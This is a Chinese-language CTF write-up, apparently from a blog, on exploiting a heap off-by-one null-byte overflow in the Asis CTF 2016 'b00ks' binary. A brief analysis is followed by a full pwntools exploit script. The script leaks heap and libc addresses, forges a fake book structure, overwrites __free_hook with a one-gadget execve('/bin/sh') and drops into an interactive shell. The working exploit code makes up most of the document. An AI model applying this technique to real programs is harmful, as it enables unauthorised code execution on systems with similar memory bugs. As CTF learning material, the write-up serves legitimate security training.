heap off by one

实例:
Asis CTF 2016 b00ks
程序分析:

strlen不计算最后一个0,而strcpy会复制最后一个0,这里的关键在于将存储堆指针的数据给改了,后续都是通过这个指针访问目标堆的,如此导致可被利用,很多heap的题都是修改了存储堆指针的数组来利用的,后面的unlink题也有类似情况
2个全局指针指向author_name和book的数组, author_name后面紧挨着book指针数组. book指针数组存储各个book结构体地址,
各个book分配在堆里面,book的name和desc也分配在堆里面.

exp总结
1.主线程超大内存块通过mmap分配,分配的内存在libc的bss段里面可以得到libc基址
2.__free_hook和__malloc_hook经常用于堆中的劫持
3.off_by_one让控制一个指针低地址为0或者其他数值,使其指向别的可控的地方.

#coding:utf-8
from pwn import *

context.log_level = 'debug'
p = process("./b00ks")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")


def memleak1(p):
    p.sendline("4")
    log.info(p.recvuntil("Author:"))
    msg = p.recvline()
    log.info(p.recvuntil(">"))
    msg = msg.split("A"*32)[1].strip("\n")
    addr = u64(msg.ljust(8, "\x00"))
    log.success("Leaked address of struct object : " + hex(addr))
    return addr

def memleak2(p):
    p.sendline("4")
    p.recvuntil("Name: ")
    msg=p.recvline().strip("\n")
    msg=u64(msg.ljust(8, "\x00"))
    log.info(p.recv(timeout = 1))
    log.success("Leaked address of allocated area " + hex(msg))
    return msg

def change_ptr(p):
    log.progress("Changing the struct pointer")
    p.sendline("5")
    log.info(p.recvuntil(":"))
    p.sendline("A"*32)
    log.info(p.recvuntil(">"))

def fake_obj(p, payload, index):
    log.progress("Editing description")
    p.sendline("3")
    log.info(p.recvuntil(":"))
    p.sendline(str(index))
    log.info(p.recvuntil(":"))
    p.sendline(payload)

def create_book(p,size):
    p.sendline("1")
    log.info(p.recvuntil(":"))
    p.sendline(str(size))
    log.info(p.recvuntil(":"))
    p.sendline("asdf")
    log.info(p.recvuntil(":"))
    p.sendline(str(size))
    log.info(p.recvuntil(":"))
    p.sendline("asdf")
    log.info(p.recvuntil(">"))

def release():
    p.sendline("2")
    log.info(p.recvuntil(":"))
    p.sendline("2")

log.info(p.recvuntil(":"))
p.sendline("A"*32)#填满authorname，以便让book1地址覆盖掉他的0
log.info(p.recvuntil(">"))
create_book(p, 140)
addr = memleak1(p) + 0x38             #address of second object on heap，addr指向book2的name偏移处
create_book(p, 0x21000)               #allocate new area
payload = "A"*0x40 + p64(0x1) + p64(addr) * 2 + p64(0xffff) #fake obj，首地址==用authorname覆盖掉地址1的第一个字节
fake_obj(p, payload, 1) 
change_ptr(p)                         #null overflow 这时book1的地址被修改成fake book

addr = memleak2(p)#泄漏book2的name的地址
log.info(hex(addr))

#part two
'''
由于大家的环境不相同, 所以其中的个别参数需要自己稍微调整一下
0x5cd010 --> 泄露的地址到libcbase的距离 
0x4526a --> libc.so.6中的execve("/bin/sh", NULL, NULL)的偏移
'''
libcbase = addr - 0x5AA010 #由于是mmap申请的内存，因此存在于libc的bss段中,并且偏移固定,以此计算libc基址
log.info("libcbase: %s" % hex(libcbase))
free_hook = libc.symbols['__free_hook'] + libcbase
execve_addr = libcbase + 0x4526a

#part three
payload = p64(111)+p64(free_hook)# 
fake_obj(p, payload, 1) #这一次将fake book的desc指向free_hook,即将book2的desc修改为free_hook地址
payload = p64(execve_addr)
fake_obj(p, payload, 2)#这一次将book2的desc的内容修改为execve_addr.
release()#当释放内存时会检查free_hook是否为0,不为0则优先调用free_hook指向的函数

p.interactive()

heap off by one

你可能感兴趣的:(heap off by one)